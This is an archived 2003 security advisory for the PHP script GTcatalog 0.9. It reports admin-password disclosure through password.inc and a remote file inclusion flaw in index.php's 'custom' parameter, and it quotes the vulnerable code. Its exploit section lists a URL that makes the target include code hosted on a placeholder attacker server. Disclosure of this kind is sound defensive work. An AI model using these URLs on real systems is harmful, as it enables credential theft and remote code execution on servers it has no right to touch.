Informations : °°°°°°°°°°°°°° Version : 0.9 Website : http://www.geektweaked.com Problem : - Informations Disclosure (Admin Password) - File Including PHP Code/Location : °°°°°°°°°°°°°°°°°°° password.inc : <? $globalpw = "[PASSWORD]"; ?> index.php : ------------------------------------------------------------------------ [...] switch ($function) { case "custom": $cc = new Template(); $cc->set_file("head",$dir_base.$dir_template."header.inc"); $cc->set_var(array( 'clientcode' => $cfg_clientcode, 'title' => $cfg_title." - ".$custom)); $cc->parse("output","head"); $cc->p("output"); include($custom.".custom.inc"); include ($dir_base.$dir_template."footer.inc"); break; [...] ------------------------------------------------------------------------ Exploits : °°°°°°°°°° - http://[target]/password.inc - http://[target]/index.php?function=custom&custom=http://[attacker]/1 with : http://[attacker]/1.custom.inc Patch : °°°°°°° A patch can be found on http://www.phpsecure.info (-> New Version !! :)) More Details : °°°°°°°°°°°°°° In French : http://www.frog-man.org/tutos/GTcatalog.txt frog-m@n _________________________________________________________________ MSN Messenger : discutez en direct avec vos amis ! http://messenger.fr.msn.be
This archive was generated by hypermail 2b30 : Mon Mar 03 2003 - 09:04:57 PST